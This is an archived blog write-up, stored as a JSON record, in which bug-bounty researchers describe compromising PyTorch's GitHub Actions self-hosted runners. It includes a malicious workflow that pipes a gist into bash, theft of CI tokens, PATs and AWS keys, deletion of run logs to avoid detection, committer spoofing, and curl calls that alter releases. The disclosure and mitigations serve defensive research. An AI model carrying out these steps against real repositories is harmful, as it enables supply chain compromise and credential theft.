{
	"id": "f37a369a-7866-43ba-ac5d-9a7697f4a1cb",
	"created_at": "2026-04-06T00:21:29.300646Z",
	"updated_at": "2026-04-10T13:11:25.057341Z",
	"deleted_at": null,
	"sha1_hash": "88a4c727e306f5418f8aeb2e985c3ba7228809aa",
	"title": "Playing with Fire – How We Executed a Critical Supply Chain Attack on PyTorch",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5849838,
	"plain_text": "Playing with Fire – How We Executed a Critical Supply Chain\r\nAttack on PyTorch\r\nPublished: 2024-01-11 · Archived: 2026-04-05 22:45:48 UTC\r\nSecurity tends to lag behind adoption, and AI/ML is no exception. \r\nFour months ago, Adnan Khan and I exploited a critical CI/CD vulnerability in PyTorch, one of the world’s leading\r\nML platforms. Used by titans like Google, Meta, Boeing, and Lockheed Martin, PyTorch is a major target for\r\nhackers and nation-states alike. \r\nThankfully, we exploited this vulnerability before the bad guys.\r\nHere is how we did it.\r\nBackground\r\nBefore we dive in, let’s scope out and discuss why Adnan and I were looking at an ML repository. Let me give you\r\na hint — it was not to gawk at the neural networks. In fact, I don’t know enough about neural networks to be\r\nqualified to gawk.\r\nPyTorch was one of the first steps on a journey Adnan and I started six months ago, based on CI/CD research and\r\nexploit development we performed in the summer of 2023. Adnan started the bug bounty foray by leveraging these\r\nattacks to exploit a critical vulnerability in GitHub that allowed him to backdoor all of GitHub’s and Azure’s runner\r\nimages, collecting a $20,000 reward. Following this attack, we teamed up to discover other vulnerable repositories.\r\nThe results of our research surprised everyone, including ourselves, as we continuously executed supply chain\r\ncompromises of leading ML platforms, billion-dollar Blockchains, and more. In the seven days since we\r\nreleased our initial blog posts, they’ve caught on in the security world. \r\nBut, you probably didn’t come here to read about our journey; you came to read about the messy details of our\r\nattack on PyTorch. Let’s begin.\r\nTell Me the Impact\r\nOur exploit path resulted in the ability to upload malicious PyTorch releases to GitHub, upload releases to AWS,\r\npotentially add code to the main repository branch, backdoor PyTorch dependencies – the list goes on. In short, it\r\nwas bad. Quite bad. \r\nAs we’ve seen before with SolarWinds, Ledger, and others, supply chain attacks like this are killer from an\r\nattacker’s perspective. With this level of access, any respectable nation-state would have several paths to a\r\nPyTorch supply chain compromise.\r\nGitHub Actions Primer\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 1 of 21\n\nTo understand our exploit, you need to understand GitHub Actions.\r\nWant to skip around? Go ahead.\r\n1. Background\r\n2. Tell Me the Impact\r\n3. GitHub Actions Primer\r\n1. Self-Hosted Runners\r\n4. Identifying the Vulnerability\r\n1. Identifying Self-Hosted Runners\r\n2. Determining Workflow Approval Requirements\r\n3. Searching for Impact\r\n5. Executing the Attack\r\n1. 1. Fixing a Typo\r\n2. 2. Preparing the Payload\r\n6. Post Exploitation\r\n1. The Great Secret Heist\r\n1. The Magical GITHUB_TOKEN\r\n2. Covering our Tracks\r\n3. Modifying Repository Releases\r\n4. Repository Secrets\r\n5. PAT Access\r\n6. AWS Access\r\n7. Submission Details – No Bueno\r\n1. Timeline\r\n8. Mitigations\r\n9. Is PyTorch an Outlier?\r\n10. References\r\nIf you’ve never worked with GitHub Actions or similar CI/CD platforms, I recommend reading up before\r\ncontinuing this blog post. Actually, if I lose you at any point, go and Google the technology that confused you.\r\nTypically, I like to start from the very basics in my articles, but explaining all the involved CI/CD processes would\r\nbe a novel in itself.\r\nIn short, GitHub Actions allow the execution of code specified within workflows as part of the CI/CD process. \r\nFor example, let’s say PyTorch wants to run a set of tests when a GitHub user submits a pull request. PyTorch can\r\ndefine these tests in a YAML workflow file used by GitHub Actions and configure the workflow to run on the\r\npull_request trigger. Now, whenever a user submits a pull request, the tests will execute on a runner. This way,\r\nrepository maintainers don’t need to manually test everyone’s code before merging. \r\nThe public PyTorch repository uses GitHub Actions extensively for CI/CD. Actually, extensively is an\r\nunderstatement. PyTorch has over 70 different GitHub workflows and typically runs over ten workflows every hour.\r\nOne of the most difficult parts of this operation was scrolling through all of the different workflows to select the\r\nones we were interested in.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 2 of 21\n\nGitHub Actions workflows execute on two types of build runners. One type is GitHub’s hosted runners, which\r\nGitHub maintains and hosts in their environment. The other class is self-hosted runners.\r\nSelf-Hosted Runners\r\nSelf-hosted runners are build agents hosted by end users running the Actions runner agent on their own\r\ninfrastructure. In less technical terms, a “self-hosted runner” is a machine, VM, or container configured to run\r\nGitHub workflows from a GitHub organization or repository. Securing and protecting the runners is the\r\nresponsibility of end users, not GitHub, which is why GitHub recommends against using self-hosted runners on\r\npublic repositories. Apparently, not everyone listens to GitHub, including GitHub.\r\nIt doesn’t help that some of GitHub’s default settings are less than secure. By default, when a self-hosted runner is\r\nattached to a repository, any of that repository’s workflows can use that runner. This setting also applies to\r\nworkflows from fork pull requests. Remember that anyone can submit a fork pull request to a public GitHub\r\nrepository. Yes, even you. The result of these settings is that, by default, any repository contributor can execute\r\ncode on the self-hosted runner by submitting a malicious PR.\r\nNote: A “contributor” to a GitHub repository is anyone who has added code to the repository. Typically, someone\r\nbecomes a contributor by submitting a pull request that then gets merged into the default branch. More on this later.\r\nIf the self-hosted runner is configured using the default steps, it will be a non-ephemeral self-hosted runner. This\r\nmeans that the malicious workflow can start a process in the background that will continue to run after the job\r\ncompletes, and modifications to files (such as programs on the path, etc.) will persist past the current workflow. It\r\nalso means that future workflows will run on that same runner.\r\nIdentifying the Vulnerability\r\nIdentifying Self-Hosted Runners\r\nTo identify self-hosted runners, we ran Gato, a GitHub attack and exploitation tool developed by Praetorian. Among\r\nother things, Gato can enumerate the existence of self-hosted runners within a repository by examining GitHub\r\nworkflow files and run logs. \r\nGato identified several persistent, self-hosted runners used by the PyTorch repository. We looked at repository\r\nworkflow logs to confirm the Gato output.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 3 of 21\n\nThe name “worker-rocm-amd-30” indicates the runner is self-hosted.\r\nDetermining Workflow Approval Requirements\r\nEven though PyTorch used self-hosted runners, one major thing could still stop us.\r\nThe default setting for workflow execution from fork PRs requires approval only for accounts that have not\r\npreviously contributed to the repository. However, there is an option to allow workflow approval for all fork PRs,\r\nincluding previous contributors. We set out to discover the status of this setting.\r\nViewing the pull request (PR) history, we found several PRs from previous contributors that triggered pull_request\r\nworkflows without requiring approval. This indicated that the repository did not require workflow approval for Fork\r\nPRs from previous contributors. Bingo.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 4 of 21\n\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 5 of 21\n\nNobody had approved this fork PR workflow, yet the “Lint / quick-checks / linux-job” workflow ran on pull_request,\r\nindicating the default approval setting was likely in place.\r\nSearching for Impact\r\nBefore executing these attacks, we like to identify GitHub secrets that we may be able to steal after landing on the\r\nrunner. Workflow files revealed several GitHub secrets used by PyTorch, including but not limited to:\r\n“aws-pytorch-uploader-secret-access-key”\r\n“aws-access-key-id”\r\n“GH_PYTORCHBOT_TOKEN” (GitHub Personal Access Token)\r\n“UPDATEBOT_TOKEN” (GitHub Personal Access Token)\r\n“conda-pytorchbot-token”\r\nWe were psyched when we saw the GH_PYTORCHBOT_TOKEN and UPDATEBOT_TOKEN. A PAT is one of\r\nyour most valuable weapons if you want to launch a supply chain attack.\r\nUsing self-hosted runners to compromise GitHub secrets is not always possible. Much of our research has been\r\naround self-hosted runner post-exploitation; figuring out methods to go from runner to secrets.  PyTorch provided a\r\ngreat opportunity to test these techniques in the wild.\r\nExecuting the Attack\r\n1. Fixing a Typo\r\nWe needed to be a contributor to the PyTorch repository to execute workflows, but we didn’t feel like spending time\r\nadding features to PyTorch. Instead, we found a typo in a markdown file and submitted a fix. Another win for the\r\nGrammar Police.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 6 of 21\n\nYes, I’m re-using this meme from my last article, but it fits too well.\r\n2. Preparing the Payload\r\nNow we had to craft a workflow payload that would allow us to obtain persistence on the self-hosted runner. Red\r\nTeamers know that installing persistence in production environments typically isn’t as trivial as a reverse Netcat\r\nshell. EDR, firewalls, packet inspection, and more can be in play, particularly in large corporate environments. \r\nWhen we started these attacks, we asked ourselves the following question – what could we use for Command and\r\nControl (C2) that we know for sure would bypass EDR with traffic that would not be blocked by any firewall? The\r\nanswer is elegant and obvious – we could install another self-hosted GitHub runner and attach it to our private\r\nGitHub organization. \r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 7 of 21\n\nOur “Runner on Runner” (RoR) technique uses the same servers for C2 as the existing runner, and the only binary\r\nwe drop is the official GitHub runner agent binary, which is already running on the system. See ya, EDR and\r\nfirewall protections.\r\nWe created a script to automate the runner registration process and included that as our malicious workflow\r\npayload. Storing our payload in a gist, we submitted a malicious draft PR. The modified workflow looked\r\nsomething like this:\r\nname: “🚨 pre-commit”\r\nrun-name: “Refactoring and cleanup”\r\non:\r\n pull_request:\r\n   branches: main\r\njobs:\r\n build:\r\n   name: Linux ARM64\r\n   runs-on: ${{ matrix.os }}\r\n   strategy:\r\n     matrix:\r\n       os: [\r\n             {system: “ARM64”, name: “Linux ARM64”},\r\n             {system: “benchmark”, name: “Linux Intel”},\r\n             {system: “glue-notify”, name: “Windows Intel”}\r\n       ]\r\n   steps:\r\n     – name: Lint Code Base\r\n       continue-on-error: true\r\n       env:\r\n          VERSION: ${{ matrix.version }}\r\n          SYSTEM_NAME: ${{ matrix.os }}\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 8 of 21\n\nrun: curl \u003cGIST_URL\u003e | bash\r\nThis workflow executes the RoR gist payload on three of PyTorch’s self-hosted runners – a Linux ARM64 machine\r\nnamed “ARM64”, an Intel device named “benchmark,” and a Windows box named “glue-notify.” \r\nEnabling draft status ensured that repository maintainers wouldn’t receive a notification. However, with the\r\ncomplexity of PyTorch’s CI/CD environment, I’d be surprised if they noticed either way. We submitted the PR and\r\ninstalled our RoR C2 on each self-hosted runner.\r\nWe used our C2 repository to execute the pwd \u0026\u0026 ls \u0026\u0026 /home \u0026\u0026 ip a command on the runner labeled “jenkins-worker-rocm-amd-34”, confirming stable C2 and remote code execution. We also ran sudo -l to confirm we had\r\nroot access.\r\nPost Exploitation\r\nWe now had root on a self-hosted runner. So what? We had seen previous reports of gaining RCE on self-hosted\r\nrunners, and they were often met with ambiguous responses due to their ambiguous impact. Given the complexity\r\nof these attacks, we wanted to demonstrate a legitimate impact on PyTorch to convince them to take our report\r\nseriously. And we had some cool new post-exploitation techniques we’d been wanting to try.\r\nThe Great Secret Heist\r\nIn cloud and CI/CD environments, secrets are king. When we began our post-exploitation research, we focused on\r\nthe secrets an attacker could steal and leverage in a typical self-hosted runner setup. Most of the secret stealing\r\nstarts with the GITHUB_TOKEN. \r\nThe Magical GITHUB_TOKEN\r\nTypically, a workflow needs to checkout a GitHub repository to the runner’s filesystem, whether to run tests defined\r\nin the repository, commit changes, or even publish releases. The workflow can use a GITHUB_TOKEN to\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 9 of 21\n\nauthenticate to GitHub and perform these operations. GITHUB_TOKEN permissions can vary from read-only\r\naccess to extensive write privileges over the repository. If a workflow executes on a self-hosted runner and uses a\r\nGITHUB_TOKEN, that token will be on the runner for the duration of that build.\r\nPyTorch had several workflows that used the actions/checkout step with a GITHUB_TOKEN that had write\r\npermissions. For example, by searching through workflow logs, we can see the periodic.yml workflow also ran on\r\nthe jenkins-worker-rocm-amd-34 self-hosted runner. The logs confirmed that this workflow used a\r\nGITHUB_TOKEN with extensive write permissions. \r\nThis token would only be valid for the life of that particular build. However, we developed some special techniques\r\nto extend the build length once you are on the runner (more on this in a future post). Due to the insane number of\r\nworkflows that run daily from the PyTorch repository, we were not worried about tokens expiring, as we could\r\nalways compromise another one.\r\nWhen a workflow uses the actions/checkout step, the GITHUB_TOKEN is stored in the .git/config file of the\r\nchecked-out repository on the self-hosted runner during an active workflow. Since we controlled the runner, all we\r\nhad to do was wait until a non-PR workflow ran on the runner with a privileged GITHUB_TOKEN and then print\r\nout the contents of the config file. \r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 10 of 21\n\nWe used our RoR C2 to steal the GITHUB_TOKEN of an ongoing workflow with write permissions.\r\nCovering our Tracks\r\nOur first use of the GITHUB_TOKEN was to eliminate the run logs from our malicious pull request. We wanted a\r\nfull day to perform post-exploitation and didn’t want to cause any alarms from our activity. We used the GitHub\r\nAPI along with the token to delete the run logs for each of the workflows our PR triggered. Stealth mode =\r\nactivated.\r\ncurl -L \\\r\n  -X DELETE \\\r\n  -H “Accept: application/vnd.github+json” \\\r\n  -H “Authorization: Bearer $STOLEN_TOKEN” \\\r\n  -H “X-GitHub-Api-Version: 2022-11-28” \\\r\n\u003ca\r\nhref=\"https://api.github.com/repos/pytorch/pytorch/runs/https://api.github.com/repos/pytorch/pytorch/runs/\u003crun_id\u003e\r\nIf you want a challenge, you can try to discover the workflows associated with our initial malicious PR and observe\r\nthat the logs no longer exist. In reality, they likely wouldn’t have caught our workflows anyway. PyTorch has so\r\nmany workflow runs that it reaches the limit for a single repository after a few days.\r\nModifying Repository Releases\r\nUsing the token, we could upload an asset claiming to be a pre-compiled, ready-to-use PyTorch binary and add\r\na release note with instructions to run and download the binary. Any users that downloaded the binary would then\r\nbe running our code. If the current source code assets were not pinned to the release commit, the attacker could\r\noverwrite those assets directly. As a POC, we used the following cURL request to modify the name of a PyTorch\r\nGitHub release. We just as easily could have uploaded our own assets.\r\ncurl -L \\\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 11 of 21\n\n-X PATCH \\\r\n  -H “Accept: application/vnd.github+json” \\\r\n  -H “Authorization: Bearer $GH_TOKEN” \\\r\n  -H “X-GitHub-Api-Version: 2022-11-28” \\\r\n  https://api.github.com/repos/pytorch/pytorch/releases/102257798 \\\r\n  -d ‘{“tag_name”:”v2.0.1″,”name”:”PyTorch 2.0.1 Release, bug fix release (- John Stawinski)”}’\r\nAs a POC, we added my name to the latest PyTorch release at the time. A malicious attacker could execute a similar\r\nAPI request to replace the latest release artifact with their malicious artifact.\r\nRepository Secrets\r\nIf backdooring PyTorch repository releases sounds fun, well, that is only a fraction of the impact we achieved\r\nwhen we looked at repository secrets.\r\nThe PyTorch repository used GitHub secrets to allow the runners to access sensitive systems during the automated\r\nrelease process. The repository used a lot of secrets, including several sets of AWS keys and GitHub Personal\r\nAccess Tokens (PATs) discussed earlier.\r\nSpecifically, the weekly.yml workflow used the GH_PYTORCHBOT_TOKEN and UPDATEBOT_TOKEN secrets to\r\nauthenticate to GitHub. GitHub Personal Access Tokens (PATs) are often overprivileged, making them a great target\r\nfor attackers. This workflow did not run on a self-hosted runner, so we couldn’t wait for a run and then steal the\r\nsecrets from the filesystem (a technique we use frequently).\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 12 of 21\n\nThe weekly.yml workflow used two PATs as secrets. This workflow called the _update-commit-hash workflow, which\r\nspecified use of a GitHub-hosted runner.\r\nEven though this workflow wouldn’t run on our runner, the GITHUB_TOKENs we could compromise had\r\nactions:write privileges. We could use the token to trigger workflows with the workflow_dispatch event. Could we\r\nuse that to run our malicious code in the context of the weekly.yml workflow? \r\nWe had some ideas but weren’t sure whether they’d work in practice. So, we decided to find out.\r\nIt turns out that you can’t use a GITHUB_TOKEN to modify workflow files. However, we discovered several\r\ncreative…”workarounds”…that will let you add malicious code to a workflow using a GITHUB_TOKEN. In this\r\nscenario, weekly.yml used another workflow, which used a script outside the .github/workflows directory. We could\r\nadd our code to this script in our branch. Then, we could trigger that workflow on our branch, which would\r\nexecute our malicious code.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 13 of 21\n\nIf this sounds confusing, don’t worry; it also confuses most bug bounty programs. Hopefully, we’ll get to provide an\r\nin-depth look at this and our other post-exploitation techniques at a certain security conference in LV, NV. If we\r\ndon’t get that opportunity, we’ll cover our other methods in a future blog post.\r\nBack to the action. To execute this phase of the attack, we compromised another GITHUB_TOKEN and used it to\r\nclone the PyTorch repository. We created our own branch, added our payload, and triggered the workflow.\r\nAs a stealth bonus, we changed our git username in the commit to pytorchmergebot, so that our commits and\r\nworkflows appeared to be triggered by the pytorchmergebot user, who interacted frequently with the PyTorch\r\nrepository.\r\nOur payload ran in the context of the weekly.yml workflow, which used the GitHub secrets we were after. The\r\npayload encrypted the two GitHub PATs and printed them to the workflow log output. We protected the private\r\nencryption key so that only we could perform decryption.\r\nWe triggered the weekly.yml workflow on our citesting1112 branch using the following cURL command.\r\ncurl -L \\\r\n  -X POST \\\r\n  -H “Accept: application/vnd.github+json” \\\r\n  -H “Authorization: Bearer $STOLEN_TOKEN” \\\r\n  -H “X-GitHub-Api-Version: 2022-11-28” \\\r\n  https://api.github.com/repos/pytorch/pytorch/actions/workflows/weekly.yml/dispatches \\\r\n  -d ‘{“ref”:”citesting1112″}’\r\nNavigating to the PyTorch “Actions” tab, we saw our encrypted output containing the PATs in the results of the\r\n“Weekly” workflow.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 14 of 21\n\nFinally, we canceled the workflow run and deleted the logs.\r\nPAT Access\r\nAfter decrypting the GitHub PATs, we enumerated their access with Gato.\r\nWe decrypted the PATs with our private key.\r\nGato revealed the PATs had access to over 93 repositories within the PyTorch organization, including many\r\nprivate repos and administrative access over several. These PATs provided multiple paths to supply chain\r\ncompromise. \r\nFor example, if an attacker didn’t want to bother with tampering releases, they could likely add code directly to the\r\nmain branch of PyTorch. The main branch was protected, but the PAT belonging to pytorchbot could create a new\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 15 of 21\n\nbranch and add its own code, and then the PAT belonging to pytorchupdatebot could approve the PR. We could then\r\nuse pytorchmergebot to trigger the merge.\r\nWe didn’t use that attack path to add code to the main branch, but existing PyTorch PRs indicated it was possible.\r\nEven if an attacker couldn’t push directly to the main branch, there are other paths to supply chain compromise.\r\nIf the threat actor wanted to be more stealthy, they could add their malicious code to one of the other private or\r\npublic repositories used by PyTorch within the PyTorch organization. These repositories had less visibility and were\r\nless likely to be closely reviewed. Or, they could smuggle their code into a feature branch, or steal more secrets, or\r\ndo any number of creative techniques to compromise the PyTorch supply chain. \r\nAWS Access\r\nTo prove that the PAT compromise was not a one-off, we decided to steal more secrets – this time, AWS keys.\r\nWe won’t bore you with all the details, but we executed a similar attack to the one above to steal the aws-pytorch-uploader-secret-access-key and aws-access-key-id belonging to the pytorchbot AWS user. These AWS keys had\r\nprivileges to upload PyTorch releases to AWS, providing another path to backdoor PyTorch releases. The impact of\r\nthis attack would depend on the sources that pulled releases from AWS and the other assets in this AWS account.\r\nWe used the AWS CLI to confirm the AWS credentials belonged to the pytorchbot AWS user.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 16 of 21\n\nWe listed the contents of the “pytorch” bucket, revealing many sensitive artifacts, including PyTorch releases.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 17 of 21\n\nWe discovered production PyTorch artifacts and confirmed write access to S3. We later confirmed that the PyTorch\r\nwebsite pulls directly from these releases, so backdooring releases in these S3 buckets would allow an attacker to\r\ncompromise any user that downloaded PyTorch from the PyTorch website, whether manually or with a `pip install`.\r\nThere were other sets of AWS keys, GitHub PATs, and various credentials we could have stolen, but we believed we\r\nhad a clear demonstration of impact at this point. Given the critical nature of the vulnerability, we wanted to submit\r\nthe report as soon as possible before one of PyTorch’s 3,500 contributors decided to make a deal with a foreign\r\nadversary.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 18 of 21\n\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 19 of 21\n\nA full attack path diagram.\r\nSubmission Details – No Bueno\r\nOverall, the PyTorch submission process was blah, to use a technical term. They frequently had long response\r\ntimes, and their fixes were questionable. \r\nWe also learned this wasn’t the first time they had issues with self-hosted runners – earlier in 2023, Marcus Young\r\nexecuted a pipeline attack to gain RCE on a single PyTorch runner. Marcus did not perform the post-exploitation\r\ntechniques we used to demonstrate impact, but PyTorch still should have locked down their runners after his\r\nsubmission. Marcus’ report earned him a $10,000 bounty. \r\nWe haven’t investigated PyTorch’s new setup enough to provide our opinion on their solution to securing their\r\nrunners. Rather than require approval for contributor’s fork PRs, PyTorch opted to implement a layer of controls to\r\nprevent abuse. \r\nTimeline\r\nAugust 9th, 2023 – Report submitted to Meta bug bounty\r\nAugust 10th, 2023 – Report “sent to appropriate product team”\r\nSeptember 8th, 2023 – We reached out to Meta to ask for an update\r\nSeptember 12th, 2023 – Meta said there is no update to provide\r\nOctober 16th, 2023 – Meta said “we consider the issue mitigated, if you think this wasn’t fully mitigated, please let\r\nus know.”\r\nOctober 16th, 2023 – We responded by saying we believed the issue had not been fully mitigated.\r\nNovember 1st, 2023 – We reached out to Meta, asking for another update.\r\nNovember 21st, 2023 – Meta responded, saying they reached out to a team member to provide an update.\r\nDecember 7th, 2023 – After not receiving an update, we sent a strongly worded message to Meta, expressing our\r\nconcerns about the disclosure process and the delay in remediation.\r\nDecember 7th, 2023 – Meta responded, saying they believed the issue was mitigated and the delay was regarding\r\nthe bounty.\r\nDecember 7th, 2023 – Several back-and-forths ensued discussing remediation.\r\nDecember 15th, 2023 – Meta awarded a $5000 bounty, plus 10% due to the delay in payout.\r\nDecember 15th, 2023 – Meta provided more detail as to the remediation steps they performed after the initial\r\nvulnerability disclosure and offered to set up a call if we had more questions.\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 20 of 21\n\nDecember 16th, 2023 – We responded, opting not to set up a call, and asked a question about bounty payout (at this\r\npoint, we were pretty done with looking at PyTorch).\r\nMitigations\r\nThe easiest way to mitigate this class of vulnerability is to change the default setting of ‘Require approval for first-time contributors’ to ‘Require approval for all outside collaborators’. It is a no-brainer for any public repository that\r\nuses self-hosted runners to ensure they use the restrictive setting, although PyTorch seems to disagree.\r\nIf workflows from fork-PRs are necessary, organizations should only use GitHub-hosted runners. If self-hosted\r\nrunners are also necessary, use isolated, ephemeral runners and ensure you know the risks involved.\r\nIt is challenging to design a solution allowing anyone to run arbitrary code on your infrastructure without risks,\r\nespecially in an organization like PyTorch that thrives off community contributions. \r\nIs PyTorch an Outlier?\r\nThe issues surrounding these attack paths are not unique to PyTorch. They’re not unique to ML repositories or even\r\nto GitHub. We’ve repeatedly demonstrated supply chain weaknesses by exploiting CI/CD vulnerabilities in the\r\nworld’s most advanced technological organizations across several CI/CD platforms, and those are only a small\r\nsubset of the greater attack surface. \r\nThreat actors are starting to catch on, as shown by the year-over-year increase in supply chain attacks. Security\r\nresearchers won’t always be able to find these vulnerabilities before malicious attackers.\r\nBut in this case, the researchers got there first.\r\nWant to hear more? Subscribe to the official John IV newsletter to receive live, monthly updates of my interests and\r\npassions.\r\nReferences\r\nhttps://johnstawinski.com/2024/01/05/worse-than-solarwinds-three-steps-to-hack-blockchains-github-and-ml-through-github-actions/\r\nhttps://adnanthekhan.com/2023/12/20/one-supply-chain-attack-to-rule-them-all/\r\nhttps://marcyoung.us/post/zuckerpunch/\r\nhttps://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/\r\nhttps://karimrahal.com/2023/01/05/github-actions-leaking-secrets/\r\nhttps://github.com/nikitastupin/pwnhub\r\nhttps://0xn3va.gitbook.io/cheat-sheets/ci-cd/github/actions\r\nhttps://owasp.org/www-project-top-10-ci-cd-security-risks/\r\nSource: https://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 21 of 21",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/"
	],
	"report_names": [
		"playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch"
	],
	"threat_actors": [],
	"ts_created_at": 1775434889,
	"ts_updated_at": 1775826685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/88a4c727e306f5418f8aeb2e985c3ba7228809aa.pdf",
		"text": "https://archive.orkl.eu/88a4c727e306f5418f8aeb2e985c3ba7228809aa.txt",
		"img": "https://archive.orkl.eu/88a4c727e306f5418f8aeb2e985c3ba7228809aa.jpg"
	}
}